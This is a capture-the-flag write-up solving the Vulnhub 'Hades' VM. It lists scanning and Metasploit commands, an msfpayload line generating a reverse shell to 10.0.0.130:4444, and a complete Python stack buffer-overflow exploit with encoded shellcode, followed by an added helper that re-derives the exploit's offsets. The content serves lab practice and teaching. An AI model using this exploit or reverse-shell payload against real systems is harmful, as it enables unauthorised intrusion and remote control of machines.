About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. The challenge required a combination of exploit development, reverse engineering and some out-of-the-box thinking, and I really enjoyed it. I decided to share my solution now that the competition is over. It goes without saying that this post contains a lot of SPOILERS!

Big thanks go out to the Vulnhub team for the awesome work they do. Follow @vulnhub on Twitter to keep up with the latest releases.

If you want to tackle Hades yourself, you can grab a copy of the machine here.

Keep on sploiting,

norsec0de

Commands Used

# Host Discovery
netdiscover -r 10.0.0.0/24

# Service Enumeration
nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129

# Base64 Decoding
base64 -d ssh-hades > hades.bin

# Pattern Creation
/opt/metasploit-framework/tools/pattern_create.rb 1000

# Offset Search
/opt/metasploit-framework/tools/pattern_offset.rb Af7A
/opt/metasploit-framework/tools/pattern_offset.rb 5Af6
/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133

# Finding Assembly Shellcode
/opt/metasploit-framework/tools/metasm_shell.rb
metasm> jmp $esp+80

# Reverse Shell Payload
msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t python

# Improved Shell
python -c "import pty; pty.spawn('/bin/sh')"

# File Decryption
openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file

Finished Exploit - Hades

#!/usr/bin/env python
# Python 2 script: the payload is assembled as a str and sent as raw bytes.

import socket, struct

target = '10.0.0.129'
port = 65535

# Shellcode
# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t python
# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

buf =  ""
buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b"
buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20"
buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34"
buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6"
buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57"
buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43"
buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6"
buf += "\xf8\x78\x10\xb8"

# Buffer
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer = '\x90'*11
buffer += buf
buffer += '\x90'*(131-95-11)
buffer += '\xeb\x4e\x90\x90' # esp - 0x2c
buffer += 'F'*(167-4-131)
buffer += 'B'*4 # ebp
buffer += struct.pack("<L",0x08048694) # eip
buffer += 'D'*(1000-4-4-167)

# Connect and send payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(buffer)
data = s.recv(1024)
s.close()
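As an added example (not the original post's code), here is a Python re-implementation of the Metasploit pattern_create / pattern_offset logic used above. It shows that the three lookups in the Commands Used section resolve to 171 (Af7A), 167 (5Af6) and 131 (0x34654133, which is little-endian for the bytes 3Ae4), and that these are exactly the constants the finished exploit's buffer arithmetic is built from.

```python
import string
import struct

# Added example: re-implementation of the Metasploit cyclic pattern tools,
# used here only to explain where the exploit's offsets come from.


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern of the requested length.

    The digit cycles fastest, then the lowercase letter, then the uppercase
    one, so every 4-byte window is unique for the first 20280 bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(needle, length=1000):
    """Offset of a 4-byte pattern fragment, given either as the text seen in
    the debugger ('Af7A') or as a register value (0x34654133, whose
    little-endian bytes read '3Ae4'). Returns -1 if it is not found."""
    if isinstance(needle, int):
        needle = struct.pack("<L", needle).decode("ascii")
    return pattern_create(length).find(needle)


def frame_offsets():
    """The three lookups from the Commands Used section, mapped onto the
    positions the exploit's buffer layout relies on."""
    return {
        "jmp_stub": pattern_offset(0x34654133),  # where the short jmp is placed
        "saved_ebp": pattern_offset("5Af6"),     # 'B'*4 overwrites saved EBP
        "return_addr": pattern_offset("Af7A"),   # struct.pack(...) overwrites EIP
    }


def buffer_layout_is_consistent():
    """Check the exploit's hard-coded arithmetic against the pattern offsets:
    11 NOPs + 95 shellcode bytes + 25 NOPs end at the jmp slot (131), the
    32 'F' bytes end at saved EBP (167), and EIP sits four bytes later."""
    o = frame_offsets()
    nops_after_shellcode = o["jmp_stub"] - 95 - 11
    filler = o["saved_ebp"] - 4 - o["jmp_stub"]
    return (nops_after_shellcode == 25 and filler == 32
            and o["return_addr"] == o["saved_ebp"] + 4)
```

The 1000-byte pattern this produces ends in "Bh2B", matching the commented-out buffer in the exploit.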